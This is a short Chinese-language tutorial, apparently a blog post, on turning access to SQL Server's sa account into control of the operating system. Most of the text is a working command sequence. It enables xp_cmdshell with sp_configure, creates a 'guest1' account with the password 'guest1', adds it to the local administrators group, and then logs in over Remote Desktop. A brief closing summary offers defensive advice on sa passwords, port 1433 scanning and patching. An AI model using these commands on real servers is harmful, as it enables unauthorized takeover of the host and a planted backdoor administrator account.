如果你用sa帐号与数据库建立了连接，那么你便可以通过如下方法登录操作系统

1、开启xp_cmdshell配置权限

exec sp_configure 

'

show advanced options

',

1

go

reconfigure

go

exec sp_configure 

'

xp_cmdshell

',

1

go

reconfigure

r

2、建立登录帐号

 

exec xp_cmdshell 

'

net user guest1 guest1 /add

'

exec xp_cmdshell 

'

net localgroup administrators guest1 /add

'

exec xp_cmdshell 

'

net user

'

 

 第一行是创建帐号，用户名密码是guest1，第二行将帐号添加到administrators组，第三行显示操作系统内帐号

3、远程桌面连接试试，看是否用上述帐号能够登上远程的操作系统

 以上代码仅做测试使用，如果未成功可能与本地设置有关。

 

总结：

1、sa帐号密码复杂度一定高，破解了sa密码，就相当于进入了操作系统，权限越大，造成的损失就可能越大。

2、数据库连接是可以做很多事情的，所以很多扫描工具，sql server的端口1433是重点扫描的对象 。

3、及时给系统升级，打补丁。不给不法分子以可乘之机，防患于未然。